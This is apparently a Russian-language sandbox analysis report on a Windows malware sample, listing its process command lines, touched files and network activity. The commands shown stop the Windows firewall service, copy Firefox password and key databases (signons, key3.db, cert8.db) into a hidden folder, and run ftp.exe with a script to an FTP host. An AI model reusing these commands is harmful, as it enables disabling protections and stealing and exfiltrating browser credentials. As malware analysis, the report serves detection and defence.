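Техническая информация

Запускаемые процессы (судя по командным строкам, образец останавливает и запускает службу sharedaccess — брандмауэр Windows/ICS, копирует файлы профиля Firefox signons*.txt и *.db в C:\RECYCLER\Firefox\ и вызывает ftp.exe со сценарием C:\RECYCLER\vict.ftp):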
- <SYSTEM32>\net1.exe start sharedaccess
- <SYSTEM32>\ftp.exe -n -s:C:\RECYCLER\vict.ftp
- <SYSTEM32>\cmd.exe /c ""%TEMP%\selfdel0.bat" "
- <SYSTEM32>\alg.exe
- <SYSTEM32>\net1.exe stop sharedaccess
- <SYSTEM32>\xcopy.exe "%APPDATA%\Mozilla\Firefox\signons*.txt" "C:\RECYCLER\Firefox\" /S
- <SYSTEM32>\cmd.exe /c ""%TEMP%\1.tmp\batfile.bat" "
- <SYSTEM32>\net.exe stop sharedaccess
- <SYSTEM32>\xcopy.exe "%APPDATA%\Mozilla\Firefox\*.db" "C:\RECYCLER\Firefox\" /S
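Затронутые файлы (cert8.db, key3.db и secmod.db — базы сертификатов, ключей и модулей безопасности профиля Firefox; записи ниже повторяются — вероятно, в исходном отчёте это были отдельные списки, подзаголовки которых не сохранились):
- C:\RECYCLER\Firefox\Profiles\cwdgt0y8.default\secmod.db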
- C:\RECYCLER\vict.ftp
- %TEMP%\selfdel0.bat
- %TEMP%\1.tmp\batfile.bat
- C:\RECYCLER\Firefox\Profiles\cwdgt0y8.default\cert8.db
- C:\RECYCLER\Firefox\Profiles\cwdgt0y8.default\key3.db
- C:\RECYCLER\Firefox\Profiles\cwdgt0y8.default\secmod.db
- %TEMP%\1.tmp\batfile.bat
- C:\RECYCLER\Firefox\Profiles\cwdgt0y8.default\cert8.db
- C:\RECYCLER\Firefox\Profiles\cwdgt0y8.default\key3.db
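Сетевая активность (порт 21 — FTP, что согласуется с запуском ftp.exe выше; символ «#» в имени узла, по-видимому, скрывает часть имени в отчёте):
- 'ft#.iw-h.de':21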
- 'localhost':1037
- DNS ASK ft#.iw-h.de